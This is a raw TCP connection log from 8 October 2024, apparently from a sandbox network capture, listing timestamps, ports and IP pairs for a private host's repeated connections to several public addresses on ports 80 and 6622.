                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.089025021 CEST4992680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.094026089 CEST804992618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.094161034 CEST4992680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.094455004 CEST4992680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.094480038 CEST4992680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.099567890 CEST804992618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.099632978 CEST804992618.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.310163975 CEST4992980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.315087080 CEST80499293.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.315160036 CEST4992980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.315296888 CEST4992980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.315315962 CEST4992980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.320262909 CEST80499293.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.320300102 CEST80499293.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.410798073 CEST4992680192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.435662985 CEST4993080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.441243887 CEST804993018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.441317081 CEST4993080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.441497087 CEST4993080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.441510916 CEST4993080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.447660923 CEST804993018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.447702885 CEST804993018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.791634083 CEST80499293.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.791811943 CEST4992980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.792218924 CEST80499293.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.794544935 CEST4992980192.168.2.43.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.797250986 CEST80499293.94.10.34192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.817392111 CEST499336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.822237015 CEST662249933204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.822314024 CEST499336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.826184034 CEST499336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:56.831180096 CEST662249933204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.102057934 CEST4993780192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.107104063 CEST8049937165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.108795881 CEST4993780192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.108974934 CEST4993780192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.109078884 CEST4993780192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.113812923 CEST8049937165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.114052057 CEST8049937165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.773281097 CEST804993018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.773768902 CEST4993080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.774302959 CEST804993018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.774353027 CEST4993080192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.778845072 CEST804993018.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.817976952 CEST8049937165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.861377954 CEST4994380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.863815069 CEST4993780192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.866333008 CEST804994318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.866494894 CEST4994380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.866677046 CEST4994380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.866677046 CEST4994380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.871486902 CEST804994318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.871975899 CEST804994318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.879245043 CEST4993780192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.879275084 CEST4993780192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.885492086 CEST8049937165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:57.885613918 CEST8049937165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.107155085 CEST8049937165.160.15.20192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.160681009 CEST4993780192.168.2.4165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.245235920 CEST4994580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.251214027 CEST804994554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.251297951 CEST4994580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.253988981 CEST4994580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.254019022 CEST4994580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.258925915 CEST804994554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.259094000 CEST804994554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.303920984 CEST662249933204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.303982019 CEST499336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.304050922 CEST499336622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.308998108 CEST662249933204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.321844101 CEST804994318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.322540998 CEST804994318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.322731972 CEST4994380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.322731972 CEST4994380192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.328337908 CEST804994318.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.393954992 CEST4994780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.399049997 CEST804994744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.399126053 CEST4994780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.399272919 CEST4994780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.399286985 CEST4994780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.404444933 CEST804994744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.405003071 CEST804994744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.877732038 CEST804994744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.877985954 CEST4994780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.878351927 CEST804994744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.878417969 CEST4994780192.168.2.444.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.884533882 CEST804994744.221.84.105192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.959841967 CEST4995280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.964818001 CEST804995218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.964889050 CEST4995280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.965022087 CEST4995280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.965061903 CEST4995280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.969903946 CEST804995218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.971285105 CEST804995218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.973433018 CEST804994554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.973659992 CEST804994554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.973942041 CEST4994580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.974044085 CEST4994580192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:58.979840040 CEST804994554.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.074393034 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.074876070 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.079935074 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080048084 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080276012 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080290079 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080319881 CEST8049877208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.080385923 CEST4987780192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.085211039 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.085416079 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.317637920 CEST499566622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.322542906 CEST662249956204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.322773933 CEST499566622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.326559067 CEST499566622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.331444025 CEST662249956204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.585763931 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.629511118 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.645131111 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.645941973 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.650160074 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.650823116 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.824840069 CEST8049954208.100.26.245192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:28:59.879446030 CEST4995480192.168.2.4208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.077646971 CEST4996380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.082875967 CEST804996334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.083643913 CEST4996380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.083837032 CEST4996380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.083837032 CEST4996380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.088715076 CEST804996334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.088866949 CEST804996334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.307182074 CEST804995218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.308111906 CEST804995218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.308274031 CEST4995280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.308274031 CEST4995280192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.313071966 CEST804995218.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.461944103 CEST4996680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.466928959 CEST804996644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.467097998 CEST4996680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.467190981 CEST4996680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.467216015 CEST4996680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.472729921 CEST804996644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.472743034 CEST804996644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.779880047 CEST662249956204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.779947042 CEST499566622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.779983997 CEST499566622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.785613060 CEST662249956204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.820430040 CEST804996334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.820545912 CEST804996334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.820749044 CEST4996380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.820966959 CEST4996380192.168.2.434.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.825834990 CEST804996334.211.97.45192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.944323063 CEST804996644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.944668055 CEST804996644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.944749117 CEST4996680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.944852114 CEST4996680192.168.2.444.213.104.86
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:00.949795008 CEST804996644.213.104.86192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.122517109 CEST4997180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.127638102 CEST804997118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.127727032 CEST4997180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.134105921 CEST4997180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.134129047 CEST4997180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.138987064 CEST804997118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.139023066 CEST804997118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.182029009 CEST4997380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.187623978 CEST804997354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.187697887 CEST4997380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.191152096 CEST4997380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.191293955 CEST4997380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.196310043 CEST804997354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.196368933 CEST804997354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.598387003 CEST804997118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.598910093 CEST804997118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.599574089 CEST4997180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.600449085 CEST4997180192.168.2.418.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.605381966 CEST804997118.208.156.248192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.786901951 CEST499786622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.795488119 CEST662249978204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.795782089 CEST499786622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.799459934 CEST499786622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.804383993 CEST662249978204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.906785011 CEST4997980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.945660114 CEST804997913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.945708990 CEST804997354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.945745945 CEST804997354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.945765972 CEST4997980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.945844889 CEST804997354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.945851088 CEST4997380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.946293116 CEST4997380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.946935892 CEST4997980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.946935892 CEST4997980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.947422981 CEST4997380192.168.2.454.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.952557087 CEST804997913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.952570915 CEST804997913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:01.952583075 CEST804997354.244.188.177192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.529402018 CEST4998580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.534229994 CEST804998518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.534301043 CEST4998580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.534840107 CEST4998580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.534946918 CEST4998580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.539683104 CEST804998518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:02.539810896 CEST804998518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.288295984 CEST662249978204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.288852930 CEST499786622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.288899899 CEST499786622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.295183897 CEST662249978204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.323447943 CEST804997913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.324141026 CEST804997913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.324208021 CEST4997980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.324800968 CEST4997980192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.330118895 CEST804997913.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.852286100 CEST4999380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.858314991 CEST804999313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.858409882 CEST4999380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.858597994 CEST4999380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.858628988 CEST4999380192.168.2.413.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.864722967 CEST804999313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.864892960 CEST804999313.251.16.150192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.884291887 CEST804998518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.884665966 CEST4998580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.888252974 CEST804998518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.888319016 CEST4998580192.168.2.418.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:03.891433001 CEST804998518.141.10.107192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.301779985 CEST499976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.307909966 CEST662249997204.10.160.212192.168.2.4
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.307991028 CEST499976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.316235065 CEST499976622192.168.2.4204.10.160.212
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:04.321176052 CEST662249997204.10.160.212192.168.2.4
